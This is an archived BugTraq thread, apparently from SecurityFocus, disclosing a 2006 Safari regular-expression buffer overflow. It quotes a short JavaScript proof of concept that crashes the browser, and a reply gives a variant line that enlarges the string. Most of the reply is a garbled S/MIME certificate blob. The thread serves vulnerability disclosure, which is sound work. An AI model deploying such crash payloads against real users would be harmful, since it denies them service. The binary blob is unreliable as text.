BugTraq
Apple Safari "match" Buffer Overflow Vulnerability Nov 14 2006 01:08AM
jbh_cg yahoo fr (1 replies)
Re: Apple Safari "match" Buffer Overflow Vulnerability Nov 14 2006 07:59PM
J. Oquendo (sil infiltrated net)
jbh_cg (at) yahoo (dot) fr [email concealed] wrote:
> The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.
>
> A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.
>
> <script>
> var reg = /(.)*/;
> var z = 'Z';
> while (z.length <= 8192) z+=z;
> var boum = reg.exec(z);
> </script>
>

while (z.length <= 16384) z+=z;

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams

0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ?0??0?r 'ôêôz?Än»n©0
 *?H?÷
0o1 0 USE10U
 AddTrust AB1&0$U AddTrust External TTP Network1"0 UAddTrust External CA Root0
050607080910Z
200530104838Z0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0?"0
 *?H?÷
?0?
?²9?¤ò}«A;bF7®ÍÁ`u¼9eùJG¢¹ÌHÌj?ÕM5¹¤BåÎIâ?/|Ò1ÇN´?d.)Õ¢dÄ?½?Q5y¤
Nh{z¤?¨ò?ò?Ìɤ2?» O0½?  ?ån¢Fúx¼¢o«Y^¥/ÏÊÚmª/묡³jª·.g5?yái?âæFÍ ¥ê¾ Îv:z?êüÚ'[=s"æHaÆ
Lói±¨.¶Ô1 ,¼???¤¥×?CüZ¯q×YÚº?
¯úóáÂð¤Åg?ÖÖT:Þ
¤ºw³eÈýÓtbªÊh?¡?~õGeËøMW(tÒ4ÿ0¶îöb0?,룁á0Þ0U#0?­½?z4´
&÷úÄ&Tï½à$ËT0U??g}ĝ&pK´PH|Þ=®n}0Uÿ0Uÿ
0ÿ0{Ut0r08 6 4?2http://crl.comodoca.com/AddTrustExternalCARoot.c
rl06 4 2?0http://crl.comodo.net/AddTrustExternalCARoot.crl0
 *?H?÷
?Ø?o(¬¦¢ç?Á?Û~¡ýóâð©?TBk? Ä mא?fyCqüøo¯ÛvEâ7=ÝäYx¬ô?FózÏ[?r-åFÁº)óËIy?<ºm¤mhO­r6¨¹±ý¿Ï
ð¤j?5PÏmU±ÝY0Jßm ?dI|ï6»ôãiôø9Z­K?:·íÓÏ
D¢û¿ä/p?%ûZT³Ðļmûs2,é??$-Ö?zhP?MéÌõ»gèÜ.;üNÍþ?ã¨
¥&DeéòMR§®Ü>Êk2\Alþõ] êÿÑú??Xm=?Gåþ.?ÂÌ?¡ò»0?Á0?© 
Ñ¡øsß?-?HK?«'0
 *?H?÷
0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0
061005000000Z
071005235959Z0Ù1503U ,Comodo Trust Network - PERSONA NOT VALIDATED1F0DU =Terms and Conditions of use: http://www.comodo.net/repository10U (c)2003 Comodo Limited10U
J. Oquendo1"0  *?H?÷
 sil (at) infiltrated (dot) net0 [email concealed]?0
 *?H?÷
0?½Ç?(ä$:²µDT,¢Ò;º»lpjÅ©rºSê:Ò#&Çây*?îE¥Ð)»ÜMHü~¨a¥Õ~
¹ÃX gÈÇgIçV¶§:'7ÕI´óÛ¥ªAcU|2Å^?ç¾ï¼bèïæ æ¾ÊÂ%Nï?eäùm?1×3¡+< DKu£?00?,0U#0???g}ĝ&pK´PH|Þ=®n}0
Un@.zÙ¶p_"µ?xx?rѬ$0Uÿ 0 Uÿ00 U%0+ +²10 `?H?øB 0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0¥U0?0
L J H?Fhttp://crl.comodoca.com/UTN-USERFirst-ClientAuthenticationandEmai
l.crl0J H F?Dhttp://crl.comodo.net/UTN-USERFirst-ClientAuthenticationand
Email.crl0?+z0x0;+0?/http://crt.comodoca.com/UTNAddTr
ustClientCA.crt09+0?-http://crt.comodo.net/UTNAddTrustClientCA.c
rt0U0sil (at) infiltrated (dot) net0 [email concealed]
 *?H?÷
?>|(aµ]ºGìC¡yÂó(ãü?tïë¤F<¡&S?»ê6î¢w¥ë}úæâp¾lê#è«ú]¢t^¦Ð(l??
uv?ç7¿ÒþÄÉë?#? ?PGsbT??ïÓî]>¤.¤I{?rE5K³ã?³øø?tWÏËÛXÜÊCo´ù²Öò
à´²qÃõD??þã rw¨g?+k+(`9qò!ÝÒÿ×g?Ü?¬?·¾MUõ·hóB±ò¸Äîz {?¼?|¨?6àS?&?çüJ÷??õJ?Éæ?[ýõT*?ÒéÒ'oEjÓÖ #B\Ã8ô
ö£?Ù?¯ñ¦7¶0?Á0?© 
Ñ¡øsß?-?HK?«'0
 *?H?÷
0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email0
061005000000Z
071005235959Z0Ù1503U ,Comodo Trust Network - PERSONA NOT VALIDATED1F0DU =Terms and Conditions of use: http://www.comodo.net/repository10U (c)2003 Comodo Limited10U
J. Oquendo1"0  *?H?÷
 sil (at) infiltrated (dot) net0 [email concealed]?0
 *?H?÷
0?½Ç?(ä$:²µDT,¢Ò;º»lpjÅ©rºSê:Ò#&Çây*?îE¥Ð)»ÜMHü~¨a¥Õ~
¹ÃX gÈÇgIçV¶§:'7ÕI´óÛ¥ªAcU|2Å^?ç¾ï¼bèïæ æ¾ÊÂ%Nï?eäùm?1×3¡+< DKu£?00?,0U#0???g}ĝ&pK´PH|Þ=®n}0
Un@.zÙ¶p_"µ?xx?rѬ$0Uÿ 0 Uÿ00 U%0+ +²10 `?H?øB 0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0¥U0?0
L J H?Fhttp://crl.comodoca.com/UTN-USERFirst-ClientAuthenticationandEmai
l.crl0J H F?Dhttp://crl.comodo.net/UTN-USERFirst-ClientAuthenticationand
Email.crl0?+z0x0;+0?/http://crt.comodoca.com/UTNAddTr
ustClientCA.crt09+0?-http://crt.comodo.net/UTNAddTrustClientCA.c
rt0U0sil (at) infiltrated (dot) net0 [email concealed]
 *?H?÷
?>|(aµ]ºGìC¡yÂó(ãü?tïë¤F<¡&S?»ê6î¢w¥ë}úæâp¾lê#è«ú]¢t^¦Ð(l??
uv?ç7¿ÒþÄÉë?#? ?PGsbT??ïÓî]>¤.¤I{?rE5K³ã?³øø?tWÏËÛXÜÊCo´ù²Öò
à´²qÃõD??þã rw¨g?+k+(`9qò!ÝÒÿ×g?Ü?¬?·¾MUõ·hóB±ò¸Äîz {?¼?|¨?6àS?&?çüJ÷??õJ?Éæ?[ýõT*?ÒéÒ'oEjÓÖ #B\Ã8ô
ö£?Ù?¯ñ¦7¶1?Ï0?Ë0Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0 + ?a0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
061114195937Z0# *?H?÷
 1Èë±ÿÃÓ8I?G*?Ü#ÿÔ?0R *?H?÷
 1E0C0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0Ô +?71Æ0Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0Ö *?H?÷
  1Æ Ã0®1 0 UUS1 0 UUT10USalt Lake City10U
The USERTRUST Network1!0U http://www.usertrust.com1604U-UTN-USERFirst-Clien
t Authentication and Email
Ñ¡øsß?-?HK?«'0
 *?H?÷
?ûØgjWü®h¹µ?¨¥5??B:?¶é%à???'QXò?¢è?Pò?ïZÀ?+?ÔÌ;äå=kíyìu9ØV©
i?5-ì?T*?Ò×î¹Qät ?iS·¯T½?
¨?0¦4¦P*Dr?á.?Æ£Ô\9ßÀ·1nÀ??ãR?z

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus